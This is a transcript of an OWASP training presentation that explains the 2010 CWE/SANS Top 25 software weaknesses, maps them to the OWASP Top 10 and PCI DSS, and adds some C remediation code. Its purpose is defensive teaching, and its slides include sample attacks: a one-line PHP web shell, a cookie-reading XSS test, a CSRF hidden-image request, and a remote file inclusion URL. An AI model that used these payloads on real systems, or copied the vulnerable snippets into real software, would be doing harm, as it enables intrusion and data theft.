
2010 CWE/SANS Top 25 - Mapping and Remediation Guide

Understand 2010 CWE/SANS Top 25 weaknesses, mappings to OWASP Top 10/PIC DSS V2, and ways to remediate them. Learn about common software errors and best practices for security.


Presentation Transcript


  1. OWASP Education Computer based training: 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping • Keith Turpin, The Boeing Company • OWASP Secure Coding Practices Lead • OWASP Global Projects Committee • keith.turpin@owasp.org • Nishi Kumar, IT Architect Specialist, FIS • OWASP CBT Project Lead • OWASP Global Industry Committee • Nishi.Kumar@owasp.org

  2. Objectives • Provide an overview of the 2010 CWE/SANS Top 25 • Discuss mapping relationships between the CWE/SANS Top 25, the OWASP Top 10 for 2010 and PCI DSS V2 • Understand the CWE/SANS Top 25 weaknesses and how to remediate them

  3. Organizations • MITRE - http://www.mitre.org/ The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. Mitre currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors. CWE Database - http://cwe.mitre.org/ • SANS - http://www.sans.org The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list of computing security training programs and its work with Mitre on the CWE/SANS Top 25 Most Dangerous Software Errors.

  4. Selection and Ranking • Builds on the original 2009 version • Methodology - Qualitative rather than quantitative • Factors in ranking - Prevalence and severity • Initially started with 41 candidate weaknesses

  5. 2010 CWE/SANS Top 25

  6. SANS CWE Top 25

  7. OWASP Top 10 & SANS CWE Top 25 mapping

  8. OWASP Top 10 & SANS CWE Top 25 mapping

  9. SANS CWE Top 25

  10. Mapping Considerations • SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses • SANS CWE Top 25 applies to both web and non-web applications • OWASP defines ten risks focused on web applications • OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities • PCI DSS Requirements point to both as industry best practices

  11. [1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') • Try this in your browser's address bar: javascript:alert(document.cookie)

  12. [1] CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') • E.g. output encoding with HTML entity encoding: the < character becomes &lt; the " character becomes &quot; and the tag <script> becomes &lt;script&gt;

  13. [2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

  14. [2] CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

  15. [3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') • Example: C
      #include <stdio.h>
      int main(void) {
          char last_name[20];                 /* declare array with 20 character limit */
          printf("Enter your last name: ");
          scanf("%s", last_name);             /* get input (no limit) and store in array */
      }
  • The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters
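Added example, not from the slides: a bounded replacement for the scanf("%s") read above, written in C, that keeps the slide's 20-byte last_name buffer, refuses a line that does not fit, and drains the leftover so it cannot spill into the next read. read_name_bounded and NAME_LEN are names chosen here; the _POSIX_C_SOURCE define is only there so the function can also be exercised against an in-memory stream.

```c
#define _POSIX_C_SOURCE 200809L   /* lets fmemopen() be used when testing against a string */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 20   /* same capacity as the slide's char last_name[20] */

/* Bounded replacement for scanf("%s", last_name): reads one line from `in`
 * into buf, whose capacity is cap bytes including the terminating NUL.
 * Returns  0 if a whole line fit (newline stripped),
 *          1 if the line was longer than cap-1 characters: buf is emptied and
 *            the rest of the line is drained so it cannot leak into the next read,
 *         -1 on end of input with nothing read. */
int read_name_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }

    /* No newline: either the line exactly filled the buffer and hit EOF, or it
       was too long. Peek at the next byte to tell the two cases apart. */
    int c = fgetc(in);
    if (c == EOF)
        return 0;
    while (c != EOF && c != '\n')      /* drain the oversized remainder */
        c = fgetc(in);
    buf[0] = '\0';
    return 1;
}

int main(void)
{
    char last_name[NAME_LEN];
    printf("Enter your last name: ");
    int rc = read_name_bounded(stdin, last_name, sizeof last_name);
    if (rc == 0)
        printf("Hello, %s\n", last_name);
    else if (rc == 1)
        printf("Name longer than %d characters rejected\n", NAME_LEN - 1);
    return rc == 0 ? 0 : 1;
}
```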

  16. [3] CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

  17. [4] CWE-352 Cross-Site Request Forgery (CSRF) • Example of a legitimate request:
      http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
  • Example of a forged request using a hidden image tag:
      <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

  18. [4] CWE-352 Cross-Site Request Forgery (CSRF)

  19. [5] CWE-285 Improper Authorization

  20. [5] CWE-285 Improper Authorization

  21. [6] CWE-807 Reliance on Untrusted Inputs in a Security Decision

  22. [6] CWE-807 Reliance on Untrusted Inputs in a Security Decision

  23. [7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

  24. [7] CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

  25. [8] CWE-434 Unrestricted Upload of File with Dangerous Type • Example: PHP
      <?php system($_GET['cmd']); ?>

  26. [8] CWE-434 Unrestricted Upload of File with Dangerous Type

  27. [9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

  28. [9] CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

  29. [10] CWE-311 Missing Encryption of Sensitive Data

  30. [10] CWE-311 Missing Encryption of Sensitive Data

  31. [11] CWE-798 Use of Hard-coded Credentials

  32. [11] CWE-798 Use of Hard-coded Credentials

  33. [12] CWE-805 Buffer Access with Incorrect Length Value

  34. [12] CWE-805 Buffer Access with Incorrect Length Value

  35. [13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') • Example: PHP
      $dir = $_GET['module_name'];
      include($dir . "/function.php");
  • Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com

  36. [13] CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

  37. [14] CWE-129 Improper Validation of Array Index • Example: Java
      private String[] array;
      public String getValue(int index) {
          return array[index];
      }
  • If index is outside the range of the array, this may result in an ArrayIndexOutOfBoundsException being raised

  38. [14] CWE-129 Improper Validation of Array Index

  39. [15] CWE-754 Improper Check for Unusual or Exceptional Condition • Example: Java (bad code)
      String itemName = request.getParameter(ITEM_NAME);
      if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
          ...
      }
  • The code does not check whether the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a null dereference.

  40. [15] CWE-754 Improper Check for Unusual or Exceptional Condition

  41. [16] CWE-209 Information Exposure Through an Error Message • Example: Java
      try {
          /* ... */
      } catch (Exception e) {
          System.out.println(e);
      }
  • If this output is redirected to a web user, it may represent a security problem • In this example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, the output might contain sensitive information such as SQL query structure or private information.

  42. [16] CWE-209 Information Exposure Through an Error Message

  43. [17] CWE-190 Integer Overflow or Wraparound • Example: C
      nresp = packet_get_int();
      if (nresp > 0) {
          response = xmalloc(nresp * sizeof(char *));
          for (i = 0; i < nresp; i++)
              response[i] = packet_get_string(NULL);
      }
  • If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response

  44. [17] CWE-190 Integer Overflow or Wraparound

  45. [18] CWE-131 Incorrect Calculation of Buffer Size • Example: C
      #include <stdlib.h>
      int main(void) {
          int *id_sequence;
          id_sequence = (int *) malloc(3);
          if (id_sequence == NULL) exit(1);
          id_sequence[0] = 13579;
          id_sequence[1] = 24680;
          id_sequence[2] = 97531;
      }
  • The size parameter used during the malloc() call is set to '3' which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space
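Added example, not from the slides, covering both the CWE-190 slide above and the CWE-131 slide here: an overflow-checked size multiplication, generalised to take the size limit as a parameter so it reproduces the slide's 32-bit nresp * sizeof(char *) wrap as well as the native size_t case, plus an allocator that derives the byte count from sizeof(int) instead of hard-coding 3. checked_mul and alloc_array are names chosen here.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

/* Multiply count * elem_size for a size type whose maximum is `max`, reporting
 * wraparound instead of silently truncating. Returns 1 and stores the product
 * in *out, or 0 if the product would exceed max. Passing max = UINT32_MAX
 * models the slide's 32-bit platform; max = SIZE_MAX models the native one. */
int checked_mul(uint64_t count, uint64_t elem_size, uint64_t max, uint64_t *out)
{
    if (elem_size != 0 && count > max / elem_size)
        return 0;                       /* count * elem_size > max: would wrap */
    *out = count * elem_size;
    return 1;
}

/* Allocate an array of `count` elements of `elem_size` bytes each. Returns
 * NULL when count is 0, when the byte count would not fit in size_t, or when
 * malloc fails; it never hands back a buffer smaller than the caller expects. */
void *alloc_array(size_t count, size_t elem_size)
{
    uint64_t bytes;
    if (count == 0 || !checked_mul(count, elem_size, SIZE_MAX, &bytes))
        return NULL;
    return malloc((size_t)bytes);
}

int main(void)
{
    /* CWE-190 scenario from the slide: nresp = 1073741824, sizeof(char *) = 4,
       on a platform with a 32-bit size_t. */
    uint64_t bytes;
    if (!checked_mul(1073741824u, 4, UINT32_MAX, &bytes))
        printf("nresp * sizeof(char *) would wrap on 32-bit: allocation refused\n");

    /* CWE-131 scenario: three ints need 3 * sizeof(int) bytes, not 3. */
    int *id_sequence = alloc_array(3, sizeof *id_sequence);
    if (id_sequence == NULL)
        return 1;
    id_sequence[0] = 13579;
    id_sequence[1] = 24680;
    id_sequence[2] = 97531;
    printf("allocated %zu bytes for 3 ints\n", 3 * sizeof *id_sequence);
    free(id_sequence);
    return 0;
}
```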

  46. [18] CWE-131 Incorrect Calculation of Buffer Size

  47. [19] CWE-306 Missing Authentication for Critical Function

  48. [19] CWE-306 Missing Authentication for Critical Function

  49. [20] CWE-494 Download of Code Without Integrity Check • Example: Java
      import java.net.URL;
      import java.net.URLClassLoader;
      URL[] classURLs = new URL[]{ new URL("file:subdir/") };
      URLClassLoader loader = new URLClassLoader(classURLs);
      Class loadedClass = Class.forName("loadMe", true, loader);
  • This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.

  50. [20] CWE-494 Download of Code Without Integrity Check
